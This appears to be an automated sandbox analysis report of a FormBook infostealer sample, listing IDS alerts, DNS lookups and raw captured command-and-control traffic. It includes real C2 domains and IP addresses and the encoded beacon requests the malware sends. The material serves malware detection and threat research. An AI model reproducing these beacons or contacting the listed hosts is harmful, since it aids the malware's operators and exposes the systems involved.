            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49991 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50011 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50011 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49956 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50019 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50019 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49863 -> 44.213.25.70:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.uburn.xyz
            Source: DNS query: www.nakama2-sshl.xyz
            Source: DNS query: www.lurknlarkk.xyz
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
            Source: Joe Sandbox ViewIP Address: 154.212.219.2 154.212.219.2
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /l8if/?nV=fb3YagVOau/9jH9KlQpUGbOr1Qdfq6yMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0Ivj11bpGL/ZxGuw2XpQMT5FisIZ1T3bTfJHsfnS4K0yfQKpg==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.40wxd.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /iqqs/?nV=f7Pu0FXPylRYdptnYM+M274MvaQkI0mPgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb6i2E7evasg+rZKL8K5GvfkdXq3aEhfRhQBOeogOLhyWDdw==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /eruc/?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.o731lh.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nakama2-sshl.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ak5l/?ntHx=DVDDWR70P4Ux&nV=eH+SO6exUc8kNdksa1CSzQBVVc7aplBFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhL3O0xstuwQMp3nW6pA5kKg3bBdr252Da+1tCwmPlqiVqcw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zz82x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /b8ih/?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /6wpo/?nV=s9KIkrkzrqTbzkMlvbBfjAUuuxKvGdewBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAeSSUnznUnGrbhm47OZW7gX2VGBRmOyGjZmEPzG32fut7kA==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.prj81oqde1.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /p9u3/?nV=D1Jc/C1nh+BZL85aQihK2StkCXQN9YWXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1EyuYNuFTcIXqGngDeSQ6xB8eOEHekfFMT1fbVeuWDNHI3uA==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.healthyloveforall.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /jqkr/?nV=j99yFPFWu1ukFCAkcsa1pdNTyzikS1cIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu8NEu/AkJhGyL6Y/IOsxIi9hhzm6Wfo2GHcU4TuRzIqeNlQ==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lurknlarkk.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzXF+iMRPEX9kIPKmzrc+t3cVFLxWq6eg+2bNJjDDlhrBGZQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mommymode.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /nuqv/?nV=cqR4daz/40w4b6rdKNYqvkeleB2fEiPhnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvyy/SGYyigH7HtG4hHq89KwpktbUpTg5pzo/PCicdM9eRug==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.polarmuseum.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficDNS traffic detected: DNS query: www.newdaydawning.net
            Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.uburn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.i16zb920d.cfd
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.nakama2-sshl.xyz
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
            Source: global trafficDNS traffic detected: DNS query: www.prj81oqde1.buzz
            Source: global trafficDNS traffic detected: DNS query: www.komart.shop
            Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global trafficDNS traffic detected: DNS query: www.lurknlarkk.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mommymode.site
            Source: global trafficDNS traffic detected: DNS query: www.polarmuseum.info
            Source: global trafficDNS traffic detected: DNS query: www
            Source: unknownHTTP traffic detected: POST /l8if/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.40wxd.topOrigin: http://www.40wxd.topConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 203Referer: http://www.40wxd.top/l8if/User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 39 59 71 37 77 6b 54 62 62 75 39 74 30 49 46 56 4c 43 36 7a 76 31 69 49 6c 6a 56 59 4e 4b 50 2b 54 46 56 39 67 34 3d Data Ascii: nV=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm39Yq7wkTbbu9t0IFVLC6zv1iIljVYNKP+TFV9g4=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:21 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:38:23 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
